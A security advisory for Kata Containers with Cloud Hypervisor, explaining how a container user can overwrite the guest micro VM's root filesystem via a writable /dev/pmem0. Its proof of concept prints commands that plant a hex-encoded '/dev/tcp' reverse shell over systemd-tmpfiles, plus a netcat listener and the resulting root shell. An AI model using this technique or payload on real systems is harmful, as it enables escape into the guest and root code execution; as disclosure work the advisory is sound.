PT-2026-20875 · Go · github.com/kata-containers/kata-containers/src/runtime

Published: 2026-02-19 · Updated: 2026-02-19

CVSS v4.0

5.2

Medium

Vector: AV:L/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H

Summary

An issue in Kata Containers with Cloud Hypervisor allows a container user to modify the file system used by the guest micro VM, ultimately achieving arbitrary code execution as root in that VM. The current understanding is that this does not affect the security of the host or of other containers and VMs running on that host. One caveat: arm64 QEMU lacks NVDIMM read-only support, so until upstream QEMU gains this capability, it is believed that a guest write could reach the image file.

Details

Linux virtio-pmem

The virtio-pmem probe path always registers the region as a generic pagemap that supports asynchronous flushes, but it never marks the region as read-only. Only the ND_REGION_PAGEMAP and ND_REGION_ASYNC bits are set before the region is created, so nd_region->ro always stays cleared and the block device is left writable.
Later, pmem_attach_disk() wires the region into the block layer with full read/write semantics: the block device operations call pmem_do_write(), which performs cache-flushed memcpy operations directly into the host-provided shared memory window. nvdimm_check_and_set_ro() would set the disk read-only if the region had been flagged as such, but because virtio-pmem never sets that flag, the helper becomes a no-op.
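From inside the guest, the effect of the missing read-only flag can be observed through the standard sysfs `ro` attribute of the block device. The following is a minimal Python sketch, not part of the original report: the function name and the `sysfs_root` parameter are hypothetical and exist only so that the check can be exercised against a test directory.

```python
from pathlib import Path
from typing import Optional


def block_device_is_read_only(name: str, sysfs_root: str = "/sys/block") -> Optional[bool]:
    """Return True if the kernel marks the disk read-only, False if it is
    writable, or None if the device has no sysfs entry.

    `name` is a whole-disk name such as "pmem0" (hypothetical helper,
    written for illustration only).
    """
    ro_file = Path(sysfs_root) / name / "ro"
    try:
        # The attribute contains "1" for a read-only disk and "0" otherwise.
        return ro_file.read_text().strip() == "1"
    except FileNotFoundError:
        return None
```

On an affected guest, one would expect `block_device_is_read_only("pmem0")` to return `False`, since the region is never flagged read-only.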
Cloud-Hypervisor virtio_pmem

Setting discard_writes=on causes the file backing the virtio-pmem device to be opened read-only and mapped with MAP_PRIVATE rather than MAP_SHARED. That combination means the guest can modify the private copy of the mapped pages, but those modifications never propagate back to the underlying file. The guest (and the Cloud Hypervisor process) will still read the modified data because it lives in the private copy of the mapping, so write-then-read sequences appear to succeed even though nothing is persisted. Once the mapping is dropped or the VM is restarted, those copy-on-write changes disappear, leaving the backing file unchanged.
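The copy-on-write behaviour described above can be reproduced without any hypervisor. The following is a minimal Python sketch, not Cloud Hypervisor's code: it assumes a Linux host, and the function name and sample bytes are made up for illustration. It opens a file read-only, maps it with MAP_PRIVATE and write permission, modifies the mapping, and compares what the mapping shows with what is still on disk.

```python
import mmap
import os
import tempfile


def private_mapping_demo(original: bytes, patch: bytes):
    """Write `patch` into a MAP_PRIVATE mapping of a read-only file.

    Returns (bytes seen through the mapping, bytes left in the file).
    Assumes len(patch) <= len(original) and a non-empty `original`.
    """
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        tmp.write(original)
        path = tmp.name
    try:
        fd = os.open(path, os.O_RDONLY)  # backing file opened read-only
        try:
            mapping = mmap.mmap(
                fd,
                len(original),
                flags=mmap.MAP_PRIVATE,  # private, copy-on-write mapping
                prot=mmap.PROT_READ | mmap.PROT_WRITE,
            )
            mapping[: len(patch)] = patch  # touches only the private copy
            seen = bytes(mapping[: len(original)])
            mapping.close()
        finally:
            os.close(fd)
        with open(path, "rb") as f:
            on_disk = f.read()
        return seen, on_disk
    finally:
        os.unlink(path)


if __name__ == "__main__":
    seen, on_disk = private_mapping_demo(b"original image bytes", b"patched")
    print("through mapping:", seen)
    print("in backing file:", on_disk)
```

The mapping shows the patched bytes while the file keeps its original contents, which mirrors why guest writes appear to succeed yet do not persist.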
Kata /dev/pmem0

Kata boots each pod/VM by DAX-mapping a read-only guest image from the host into the VM and telling the guest kernel to mount the resulting /dev/pmem* device as its root filesystem. Since DAX maps the backing file directly into guest memory, there is no way for the hypervisor to intercept or reject individual stores, so a container with sufficient permissions can open /dev/pmem0 and observe its own writes until the VM is rebooted or the cache is dropped.

PoC

Putting this together, a container user can modify the guest OS filesystem, replacing libraries or binaries to achieve arbitrary code execution outside the container. The user does not need to be privileged: CAP_SYS_ADMIN is not required, but CAP_MKNOD is. The attack requires computing the offset of the target file within the device, which in turn requires the partition start sector, the sector size in bytes, the filesystem block size, and the physical block index of the file.
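Whether a given container holds the capability mentioned above can be checked from the `CapEff` line of `/proc/<pid>/status`. The sketch below is an illustrative helper rather than part of the original PoC; the function names are hypothetical, while the capability numbers (CAP_SYS_ADMIN = 21, CAP_MKNOD = 27) are the Linux values.

```python
CAP_SYS_ADMIN = 21  # Linux capability numbers
CAP_MKNOD = 27


def effective_caps(status_text: str) -> int:
    """Extract the effective capability mask from /proc/<pid>/status text."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return int(line.split()[1], 16)  # the mask is printed in hex
    raise ValueError("no CapEff line found")


def has_cap(mask: int, cap: int) -> bool:
    """Return True if bit number `cap` is set in the capability mask."""
    return bool((mask >> cap) & 1)
```

Inside a container, passing the contents of `/proc/self/status` to `effective_caps` and testing the result with `has_cap(mask, CAP_MKNOD)` indicates whether the `mknod` calls in the session below would be permitted.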
To achieve execution on the guest, I replaced /usr/bin/systemd-tmpfiles with a connect-back shell to localhost; systemd timers end up executing it 15 minutes after boot. I use debugfs, which does not require mounting privileges, and work directly with the filesystem on /dev/pmem0p1 to get the absolute offset of the file to modify in the device.
If you want a simpler PoC, just use dd to write something into /dev/pmem0 and observe that it can be read back with dd until the changes are discarded.
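The offset arithmetic can be sketched as follows, using the figures printed in the "Resolution" output of the session in this section. This is an illustrative reconstruction, not the author's pmem.py; the function and parameter names are assumptions.

```python
def absolute_offset(
    partition_start_sectors: int,
    sector_size: int,
    fs_block_size: int,
    physical_block: int,
    intra_block_offset: int = 0,
) -> int:
    """Byte offset of a file block within the whole pmem device.

    `physical_block` is the filesystem block index relative to the start
    of the partition, as reported by a tool such as debugfs.
    """
    partition_start_bytes = partition_start_sectors * sector_size
    return partition_start_bytes + physical_block * fs_block_size + intra_block_offset


if __name__ == "__main__":
    # Values taken from the PoC output: partition start 2048 sectors,
    # 512-byte sectors, 4096-byte filesystem blocks, physical block 40668.
    offset = absolute_offset(2048, 512, 4096, 40668)
    print(offset, hex(offset))  # prints: 167624704 0x9fdc000
```

The result matches both the "Absolute pmem offset" line and the 09fdc000 address shown in the hex dumps.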
root@ab5392da44ce:~# mknod /dev/pmem0 b 259 0
root@ab5392da44ce:~# mknod /dev/pmem0p1 b 259 1
root@ab5392da44ce:~# python pmem.py --file /usr/bin/systemd-tmpfiles --write --pattern 23212f62696e2f626173680a62617368202d69203e26202f6465762f7463702f3132372e302e302e312f34343320303e26310a6578697420300a
=== Resolution ===
Partition device:     /dev/pmem0p1 (pmem0p1)
Partition start (sectors): 2048
Sector size (bytes):    512
Partition start (bytes):  1048576
Filesystem block size:   4096
File path:         /usr/bin/systemd-tmpfiles
File offset (bytes):    0
Logical block index:    0
Intra-block offset:    0
Physical block index:   40668
→ Absolute pmem offset:  167624704
[*] Raw read (64 bytes at 167624704):
09fdc000 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 |.ELF............|
09fdc010 03 00 3e 00 01 00 00 00 20 66 00 00 00 00 00 00 |..>..... f......|
09fdc020 40 00 00 00 00 00 00 00 48 82 01 00 00 00 00 00 |@.......H.......|
09fdc030 00 00 00 00 40 00 38 00 0d 00 40 00 20 00 1f 00 |....@.8...@. ...|
[+] Wrote 58 bytes at absolute offset 167624704. Verifying...
09fdc000 23 21 2f 62 69 6e 2f 62 61 73 68 0a 62 61 73 68 |#!/bin/bash.bash|
09fdc010 20 2d 69 20 3e 26 20 2f 64 65 76 2f 74 63 70 2f | -i >& /dev/tcp/|
09fdc020 31 32 37 2e 30 2e 30 2e 31 2f 34 34 33 20 30 3e |127.0.0.1/443 0>|
09fdc030 26 31 0a 65 78 69 74 20 30 0a          |&1.exit 0.|
root@ab5392da44ce:~# nc -lvp 443
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:44880.
bash: cannot set terminal process group (329): Inappropriate ioctl for device
bash: no job control in this shell
root@localhost:/# 
root@localhost:/# ps auxw
ps auxw
USER     PID %CPU %MEM  VSZ  RSS TTY   STAT START  TIME COMMAND
root      1 0.0 0.0 17280 1920 ?    Ss  16:16  0:01 /sbin/init
root      2 0.0 0.0   0   0 ?    S  16:16  0:00 [kthreadd]
root      3 0.0 0.0   0   0 ?    S  16:16  0:00 [pool workqueue release]
root      4 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-rcu gp]
root      5 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-sync wq]
root      6 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-slub flushwq]
root      7 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-netns]
root      9 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/0:0H-events highpri]
root     10 0.0 0.0   0   0 ?    I  16:16  0:01 [kworker/0:1-events power efficient]
root     12 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-mm percpu wq]
root     13 0.0 0.0   0   0 ?    I  16:16  0:00 [rcu tasks trace kthread]
root     14 0.0 0.0   0   0 ?    S  16:16  0:00 [ksoftirqd/0]
root     15 0.0 0.0   0   0 ?    I  16:16  0:00 [rcu sched]
root     16 0.0 0.0   0   0 ?    S  16:16  0:00 [rcu exp par gp kthread worker/1]
root     17 0.0 0.0   0   0 ?    S  16:16  0:00 [rcu exp gp kthread worker]
root     18 0.0 0.0   0   0 ?    S  16:16  0:00 [migration/0]
root     19 0.0 0.0   0   0 ?    S  16:16  0:00 [cpuhp/0]
root     20 0.0 0.0   0   0 ?    S  16:16  0:00 [kdevtmpfs]
root     21 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-inet frag wq]
root     22 0.0 0.0   0   0 ?    S  16:16  0:00 [kauditd]
root     23 0.0 0.0   0   0 ?    S  16:16  0:00 [oom reaper]
root     24 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-writeback]
root     25 0.0 0.0   0   0 ?    S  16:16  0:00 [kcompactd0]
root     26 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-cryptd]
root     27 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-kblockd]
root     28 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/0:1H]
root     29 0.0 0.0   0   0 ?    I  16:16  0:00 [kworker/u256:1-events unbound]
root     30 0.0 0.0   0   0 ?    S  16:16  0:00 [kswapd0]
root     31 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-xfsalloc]
root     32 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-xfs mru cache]
root     33 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/u257:0]
root     34 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-kthrotld]
root     36 0.0 0.0   0   0 ?    S  16:16  0:00 [irq/25-ACPI:Ged]
root     37 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-nfit]
root     38 0.0 0.0   0   0 ?    I  16:16  0:00 [kworker/0:2-virtio vsock]
root     39 0.0 0.0   0   0 ?    S  16:16  0:00 [hwrng]
root     40 0.0 0.0   0   0 ?    I  16:16  0:00 [kworker/u256:2-events unbound]
root     41 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-vfio-irqfd-cleanup]
root     42 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-mld]
root     43 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-ipv6 addrconf]
root     81 0.0 0.0   0   0 ?    S  16:16  0:00 [jbd2/pmem0p1-8]
root     82 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-ext4-rsv-conversion]
root     99 0.0 0.0   0   0 ?    I  16:16  0:00 [kworker/u256:3]
root     105 0.0 0.0 62032 2568 ?    Ssl 16:16  0:02 /usr/bin/kata-agent
 chrony   117 0.0 0.0 10692  540 ?    S  16:16  0:02 /usr/sbin/chronyd -F 1
 chrony   120 0.0 0.0 10560  460 ?    S  16:16  0:00 /usr/sbin/chronyd -F 1
root     122 0.2 1.0 44876 31556 ?    S  16:16  0:11 python -m server
message+   124 0.0 0.0  8120  384 ?    Ss  16:16  0:00 @dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root     129 0.0 0.0   0   0 ?    S  16:16  0:00 [cpuhp/1]
root     130 0.0 0.0   0   0 ?    S  16:16  0:00 [migration/1]
root     131 0.0 0.0   0   0 ?    S  16:16  0:00 [ksoftirqd/1]
root     132 0.0 0.0   0   0 ?    I  16:16  0:00 [kworker/1:0-mm percpu wq]
root     133 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/1:0H-events highpri]
root     134 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/1:1H]
root     142 0.0 0.0  5400 2220 pts/0  Ss  16:16  0:00 bash -l
root     145 0.0 0.0   0   0 ?    I  16:16  0:00 [kworker/1:1]
root     323 0.0 0.1 13212 3448 pts/0  R+  16:17  0:00 nc -lvp 443
root     329 0.0 0.0  4780  256 ?    Ss  16:31  0:00 /bin/bash /usr/bin/systemd-tmpfiles --clean
root     330 0.0 0.0  5048  512 ?    S  16:31  0:00 bash -i
root     377 0.0 0.0  7480  256 ?    R  17:33  0:00 ps auxw
root@localhost:/#

Impact

Container-to-guest micro VM escape (no escape to the host, and no persistence of the overwritten image).

Fix

Incorrect Permission

Weakness Enumeration

Related Identifiers

GHSA-WWJ6-VGHV-5P64

Affected Products

github.com/kata-containers/kata-containers/src/runtime